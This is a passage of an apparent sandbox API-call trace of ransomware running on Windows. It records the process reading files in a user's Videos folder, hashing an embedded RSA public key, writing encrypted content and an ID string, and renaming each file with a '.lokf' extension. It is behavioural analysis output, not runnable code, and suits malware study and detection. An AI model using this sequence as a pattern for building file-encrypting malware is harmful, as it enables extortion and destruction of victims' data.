KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAu9kqEhvvBEg\\/tGe7WAxi\\\\nt4twI3w9WDB8OMR3bys2yk0W7ciJWvON3sN\\/DYbcqkpmFclEZ1NaGyCrGC72RRVp\\\\nMzwS5AFncLUSG9fK6vR7MOdMBnYppfykMW8BG7VZlt35sroHHO85+mG51mDsKVxS\\\\n3Et6VtnhEfclDM+1ZNPR1SL0+WzO0nUhCMtD\\/2q9V6RsdvYPZD8XWP062MaKYQV\\/\\\\ngfBYPUYlwcY5Yrl9QFfpt2Yd5TP8lVG8klmj8fuq5uBavvrCh2YQ+cUZQnoHAysD\\\\nuMcCVY5QNKxHyweZYUaUEdpYDZgVy4Xo0savvOsp0Vg0dQWYIvWkNKLTYAoyes4N\\\\nowIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 493 [0060.603] CryptAcquireContextW (in: phProv=0x9f4fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x9f4fa50*=0x6b8478) returned 1 [0060.604] CryptCreateHash (in: hProv=0x6b8478, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x9f4fa58 | out: phHash=0x9f4fa58) returned 1 [0060.604] CryptHashData (hHash=0x327cb80, pbData=0x32afc78, dwDataLen=0x1f2, dwFlags=0x0) returned 1 [0060.604] CryptGetHashParam (in: hHash=0x327cb80, dwParam=0x2, pbData=0x0, pdwDataLen=0x9f4fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x9f4fa54) returned 1 [0060.604] CryptGetHashParam (in: hHash=0x327cb80, dwParam=0x2, pbData=0x3242688, pdwDataLen=0x9f4fa54, dwFlags=0x0 | out: pbData=0x3242688, pdwDataLen=0x9f4fa54) returned 1 [0060.604] GetLastError () returned 0x0 [0060.604] CryptDestroyHash (hHash=0x327cb80) returned 1 [0060.604] CryptReleaseContext (hProv=0x6b8478, dwFlags=0x0) returned 1 [0060.604] UuidCreate (in: Uuid=0x9f4fa48 | out: Uuid=0x9f4fa48) returned 0x0 [0060.604] UuidToStringA (in: Uuid=0x9f4fa48, StringUuid=0x9f4fa40 | out: StringUuid=0x9f4fa40) returned 0x0 [0060.604] RpcStringFreeA (in: String=0x9f4fa40 | out: String=0x9f4fa40) returned 0x0 [0060.604] RtlReAllocateHeap (Heap=0x660000, Flags=0x0, Ptr=0x9c78728, Size=0x218) returned 0x9c711f0 [0060.605] SetFilePointerEx (in: hFile=0x5cc, liDistanceToMove=0x3d63, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0060.605] WriteFile (in: hFile=0x5cc, lpBuffer=0x326f4e8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x9f4fb50, lpOverlapped=0x0 | out: lpBuffer=0x326f4e8*, lpNumberOfBytesWritten=0x9f4fb50*=0x100, lpOverlapped=0x0) returned 1 [0060.605] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0060.605] WriteFile (in: hFile=0x5cc, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x9f4fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x9f4fb50*=0x26, lpOverlapped=0x0) returned 1 [0060.605] CloseHandle (hObject=0x5cc) returned 1 [0060.606] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\27nF\\m Cm9nOn1JJtRb93m\\r00ipKmOR8h.mkv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\27nf\\m cm9non1jjtrb93m\\r00ipkmor8h.mkv"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\27nF\\m Cm9nOn1JJtRb93m\\r00ipKmOR8h.mkv.lokf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\27nf\\m cm9non1jjtrb93m\\r00ipkmor8h.mkv.lokf")) returned 1 [0060.607] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd0cc76c0, ftCreationTime.dwHighDateTime=0x1d4cbca, ftLastAccessTime.dwLowDateTime=0x6fcfb330, ftLastAccessTime.dwHighDateTime=0x1d4c79e, ftLastWriteTime.dwLowDateTime=0x6fcfb330, ftLastWriteTime.dwHighDateTime=0x1d4c79e, nFileSizeHigh=0x0, nFileSizeLow=0xf975, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="UEUtG KZ03LCY HCeSa.mkv", cAlternateFileName="UEUTGK~1.MKV")) returned 1 [0060.607] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\27nF\\m Cm9nOn1JJtRb93m\\UEUtG KZ03LCY HCeSa.mkv") returned=".mkv" [0060.607] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\27nF\\m Cm9nOn1JJtRb93m\\UEUtG KZ03LCY HCeSa.mkv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\27nf\\m cm9non1jjtrb93m\\ueutg kz03lcy hcesa.mkv"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5cc [0060.607] GetFileSizeEx (in: hFile=0x5cc, lpFileSize=0x9f4fb40 | out: lpFileSize=0x9f4fb40*=63861) returned 1 [0060.607] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3700000 [0060.610] SetFilePointerEx (in: hFile=0x5cc, liDistanceToMove=0xf94f, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0060.610] ReadFile (in: hFile=0x5cc, lpBuffer=0x3700000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x9f4fb78, lpOverlapped=0x0 | out: lpBuffer=0x3700000*, lpNumberOfBytesRead=0x9f4fb78*=0x26, lpOverlapped=0x0) returned 1 [0060.610] SetFilePointer (in: hFile=0x5cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0060.610] ReadFile (in: hFile=0x5cc, lpBuffer=0x3700000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x9f4fb70, lpOverlapped=0x0 | out: lpBuffer=0x3700000*, lpNumberOfBytesRead=0x9f4fb70*=0xf975, lpOverlapped=0x0) returned 1 [0060.611] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAu9kqEhvvBEg\\/tGe7WAxi\\\\nt4twI3w9WDB8OMR3bys2yk0W7ciJWvON3sN\\/DYbcqkpmFclEZ1NaGyCrGC72RRVp\\\\nMzwS5AFncLUSG9fK6vR7MOdMBnYppfykMW8BG7VZlt35sroHHO85+mG51mDsKVxS\\\\n3Et6VtnhEfclDM+1ZNPR1SL0+WzO0nUhCMtD\\/2q9V6RsdvYPZD8XWP062MaKYQV\\/\\\\ngfBYPUYlwcY5Yrl9QFfpt2Yd5TP8lVG8klmj8fuq5uBavvrCh2YQ+cUZQnoHAysD\\\\nuMcCVY5QNKxHyweZYUaUEdpYDZgVy4Xo0savvOsp0Vg0dQWYIvWkNKLTYAoyes4N\\\\nowIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 493 [0060.611] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAu9kqEhvvBEg\\/tGe7WAxi\\\\nt4twI3w9WDB8OMR3bys2yk0W7ciJWvON3sN\\/DYbcqkpmFclEZ1NaGyCrGC72RRVp\\\\nMzwS5AFncLUSG9fK6vR7MOdMBnYppfykMW8BG7VZlt35sroHHO85+mG51mDsKVxS\\\\n3Et6VtnhEfclDM+1ZNPR1SL0+WzO0nUhCMtD\\/2q9V6RsdvYPZD8XWP062MaKYQV\\/\\\\ngfBYPUYlwcY5Yrl9QFfpt2Yd5TP8lVG8klmj8fuq5uBavvrCh2YQ+cUZQnoHAysD\\\\nuMcCVY5QNKxHyweZYUaUEdpYDZgVy4Xo0savvOsp0Vg0dQWYIvWkNKLTYAoyes4N\\\\nowIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 493 [0060.611] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAu9kqEhvvBEg\\/tGe7WAxi\\\\nt4twI3w9WDB8OMR3bys2yk0W7ciJWvON3sN\\/DYbcqkpmFclEZ1NaGyCrGC72RRVp\\\\nMzwS5AFncLUSG9fK6vR7MOdMBnYppfykMW8BG7VZlt35sroHHO85+mG51mDsKVxS\\\\n3Et6VtnhEfclDM+1ZNPR1SL0+WzO0nUhCMtD\\/2q9V6RsdvYPZD8XWP062MaKYQV\\/\\\\ngfBYPUYlwcY5Yrl9QFfpt2Yd5TP8lVG8klmj8fuq5uBavvrCh2YQ+cUZQnoHAysD\\\\nuMcCVY5QNKxHyweZYUaUEdpYDZgVy4Xo0savvOsp0Vg0dQWYIvWkNKLTYAoyes4N\\\\nowIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 493 [0060.611] CryptAcquireContextW (in: phProv=0x9f4fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x9f4fa50*=0x6b8478) returned 1 [0060.611] CryptCreateHash (in: hProv=0x6b8478, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x9f4fa58 | out: phHash=0x9f4fa58) returned 1 [0060.611] CryptHashData (hHash=0x327cb80, pbData=0x32afc78, dwDataLen=0x1f2, dwFlags=0x0) returned 1 [0060.612] CryptGetHashParam (in: hHash=0x327cb80, dwParam=0x2, pbData=0x0, pdwDataLen=0x9f4fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x9f4fa54) returned 1 [0060.612] CryptGetHashParam (in: hHash=0x327cb80, dwParam=0x2, pbData=0x3242688, pdwDataLen=0x9f4fa54, dwFlags=0x0 | out: pbData=0x3242688, pdwDataLen=0x9f4fa54) returned 1 [0060.612] GetLastError () returned 0x0 [0060.612] CryptDestroyHash (hHash=0x327cb80) returned 1 [0060.612] CryptReleaseContext (hProv=0x6b8478, dwFlags=0x0) returned 1 [0060.612] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32afc78 | out: hHeap=0x660000) returned 1 [0060.612] UuidCreate (in: Uuid=0x9f4fa48 | out: Uuid=0x9f4fa48) returned 0x0 [0060.612] UuidToStringA (in: Uuid=0x9f4fa48, StringUuid=0x9f4fa40 | out: StringUuid=0x9f4fa40) returned 0x0 [0060.612] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x30) returned 0x3257208 [0060.612] RpcStringFreeA (in: String=0x9f4fa40 | out: String=0x9f4fa40) returned 0x0 [0060.612] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3257518 | out: hHeap=0x660000) returned 1 [0060.612] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x30) returned 0x3257518 [0060.612] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xf980) returned 0x9c8bae8 [0060.612] SetFilePointer (in: hFile=0x5cc, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0060.612] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3257208 | out: hHeap=0x660000) returned 1 [0060.612] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x1f0) returned 0x32995a0 [0060.612] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x30) returned 0x3257208 [0060.612] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x1f0) returned 0x32afc78 [0060.612] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x58) returned 0x32964a0 [0060.612] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x40) returned 0x9c89718 [0060.612] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc) returned 0x9c85f08 [0060.612] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x40) returned 0x9c89760 [0060.613] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc) returned 0x9c85f20 [0060.613] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc) returned 0x9c85f50 [0060.613] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc) returned 0x9c857d0 [0060.613] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc) returned 0x9c85f68 [0060.613] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x24) returned 0x32a08a0 [0060.613] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x158) returned 0x9c78728 [0060.613] RtlReAllocateHeap (Heap=0x660000, Flags=0x0, Ptr=0x9c78728, Size=0x218) returned 0x9c711f0 [0060.613] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x558) returned 0x32947b0 [0060.613] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c85f50 | out: hHeap=0x660000) returned 1 [0060.613] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c85f68 | out: hHeap=0x660000) returned 1 [0060.613] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c857d0 | out: hHeap=0x660000) returned 1 [0060.613] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32a08a0 | out: hHeap=0x660000) returned 1 [0060.613] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32947b0 | out: hHeap=0x660000) returned 1 [0060.613] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc) returned 0x9c857d0 [0060.613] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x8) returned 0x3278f60 [0060.613] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x10) returned 0x9c85f68 [0060.613] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x18) returned 0x32425c8 [0060.613] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x9) returned 0x9c85f50 [0060.613] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x8) returned 0x3278f30 [0060.613] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x10e) returned 0x3234418 [0060.613] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e3b0 [0060.613] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x58) returned 0x3296380 [0060.613] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x14) returned 0x3242688 [0060.613] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x104) returned 0x32452d8 [0060.613] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x14) returned 0x3242348 [0060.613] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278ec0 [0060.613] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3234418 | out: hHeap=0x660000) returned 1 [0060.613] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c85f68 | out: hHeap=0x660000) returned 1 [0060.613] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f30 | out: hHeap=0x660000) returned 1 [0060.613] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c85f50 | out: hHeap=0x660000) returned 1 [0060.613] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32425c8 | out: hHeap=0x660000) returned 1 [0060.613] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f60 | out: hHeap=0x660000) returned 1 [0060.613] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c857d0 | out: hHeap=0x660000) returned 1 [0060.613] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e3b0 | out: hHeap=0x660000) returned 1 [0060.614] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32964a0 | out: hHeap=0x660000) returned 1 [0060.614] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c711f0 | out: hHeap=0x660000) returned 1 [0060.614] GetCurrentThreadId () returned 0x9e0 [0060.614] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x100) returned 0x326f4e8 [0060.614] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x82) returned 0x9c8b2a0 [0060.614] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x2c) returned 0x3257198 [0060.614] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x80) returned 0x6b8478 [0060.614] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x148) returned 0x3201228 [0060.614] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f60 [0060.614] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f30 [0060.614] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x100) returned 0x326f800 [0060.614] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x64) returned 0x735b80 [0060.614] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x735b80 | out: hHeap=0x660000) returned 1 [0060.614] GetCurrentThreadId () returned 0x9e0 [0060.614] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x64) returned 0x735b80 [0060.614] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x735b80 | out: hHeap=0x660000) returned 1 [0060.614] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xeb) returned 0x329e1f0 [0060.614] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x64) returned 0x735b80 [0060.614] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x735b80 | out: hHeap=0x660000) returned 1 [0060.614] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x64) returned 0x735b80 [0060.614] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x735b80 | out: hHeap=0x660000) returned 1 [0060.614] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x329e1f0 | out: hHeap=0x660000) returned 1 [0060.614] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x100) returned 0x326f5f0 [0060.614] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f60 | out: hHeap=0x660000) returned 1 [0060.614] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4c) returned 0x3261528 [0060.614] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f60 [0060.614] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x100) returned 0x326f908 [0060.614] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f70 [0060.614] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc) returned 0x9c857d0 [0060.614] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f70 | out: hHeap=0x660000) returned 1 [0060.614] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f70 [0060.614] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f20 [0060.614] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f50 [0060.614] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f00 [0060.614] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278e90 [0060.614] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f40 [0060.615] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f10 [0060.615] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc) returned 0x9c85f50 [0060.615] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f20 | out: hHeap=0x660000) returned 1 [0060.615] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x8) returned 0x3278f20 [0060.615] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f70 | out: hHeap=0x660000) returned 1 [0060.615] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f70 [0060.615] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f90 [0060.615] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278fa0 [0060.615] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f80 [0060.615] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x10) returned 0x9c85f68 [0060.615] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278fa0 | out: hHeap=0x660000) returned 1 [0060.615] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x18) returned 0x32425c8 [0060.615] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f90 | out: hHeap=0x660000) returned 1 [0060.615] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc) returned 0x9c85f38 [0060.615] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f80 | out: hHeap=0x660000) returned 1 [0060.615] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x10) returned 0x9c85770 [0060.615] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f70 | out: hHeap=0x660000) returned 1 [0060.615] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x8) returned 0x3278f70 [0060.615] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f40 | out: hHeap=0x660000) returned 1 [0060.615] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc) returned 0x9c857b8 [0060.615] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f70 | out: hHeap=0x660000) returned 1 [0060.615] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc) returned 0x9c857e8 [0060.615] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f50 | out: hHeap=0x660000) returned 1 [0060.615] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x10) returned 0x9c85f80 [0060.615] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c857b8 | out: hHeap=0x660000) returned 1 [0060.615] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x10) returned 0x9c857b8 [0060.615] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c857e8 | out: hHeap=0x660000) returned 1 [0060.615] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x8) returned 0x3278f50 [0060.615] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f60 | out: hHeap=0x660000) returned 1 [0060.615] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x14) returned 0x3240c48 [0060.615] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f50 | out: hHeap=0x660000) returned 1 [0060.615] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x1c) returned 0x328e3b0 [0060.615] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c85f50 | out: hHeap=0x660000) returned 1 [0060.615] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x10) returned 0x9c85f50 [0060.616] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f20 | out: hHeap=0x660000) returned 1 [0060.616] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x204) returned 0x9c711f0 [0060.616] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c857d0 | out: hHeap=0x660000) returned 1 [0060.616] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x108) returned 0x32453f0 [0060.616] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c857b8 | out: hHeap=0x660000) returned 1 [0060.616] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x210) returned 0x326a370 [0060.616] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e3b0 | out: hHeap=0x660000) returned 1 [0060.616] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x10c) returned 0x3234418 [0060.616] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f00 | out: hHeap=0x660000) returned 1 [0060.616] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x108) returned 0x3245508 [0060.616] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c85f50 | out: hHeap=0x660000) returned 1 [0060.616] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x200) returned 0x326a588 [0060.616] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32453f0 | out: hHeap=0x660000) returned 1 [0060.616] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x100) returned 0x326f6f8 [0060.616] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f30 | out: hHeap=0x660000) returned 1 [0060.616] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6b8478 | out: hHeap=0x660000) returned 1 [0060.616] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x326f5f0 | out: hHeap=0x660000) returned 1 [0060.616] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x326f6f8 | out: hHeap=0x660000) returned 1 [0060.616] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3240c48 | out: hHeap=0x660000) returned 1 [0060.616] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3245508 | out: hHeap=0x660000) returned 1 [0060.616] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x326a370 | out: hHeap=0x660000) returned 1 [0060.616] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x326a588 | out: hHeap=0x660000) returned 1 [0060.616] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3234418 | out: hHeap=0x660000) returned 1 [0060.616] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278e90 | out: hHeap=0x660000) returned 1 [0060.616] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c85f80 | out: hHeap=0x660000) returned 1 [0060.616] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f10 | out: hHeap=0x660000) returned 1 [0060.616] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c85770 | out: hHeap=0x660000) returned 1 [0060.616] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32425c8 | out: hHeap=0x660000) returned 1 [0060.617] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c85f68 | out: hHeap=0x660000) returned 1 [0060.617] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c85f38 | out: hHeap=0x660000) returned 1 [0060.617] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3201228 | out: hHeap=0x660000) returned 1 [0060.617] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3257198 | out: hHeap=0x660000) returned 1 [0060.617] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x326f800 | out: hHeap=0x660000) returned 1 [0060.617] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c85f20 | out: hHeap=0x660000) returned 1 [0060.617] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c89760 | out: hHeap=0x660000) returned 1 [0060.617] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c711f0 | out: hHeap=0x660000) returned 1 [0060.617] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x326f908 | out: hHeap=0x660000) returned 1 [0060.617] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3261528 | out: hHeap=0x660000) returned 1 [0060.617] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32452d8 | out: hHeap=0x660000) returned 1 [0060.617] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3242688 | out: hHeap=0x660000) returned 1 [0060.617] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278ec0 | out: hHeap=0x660000) returned 1 [0060.617] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3242348 | out: 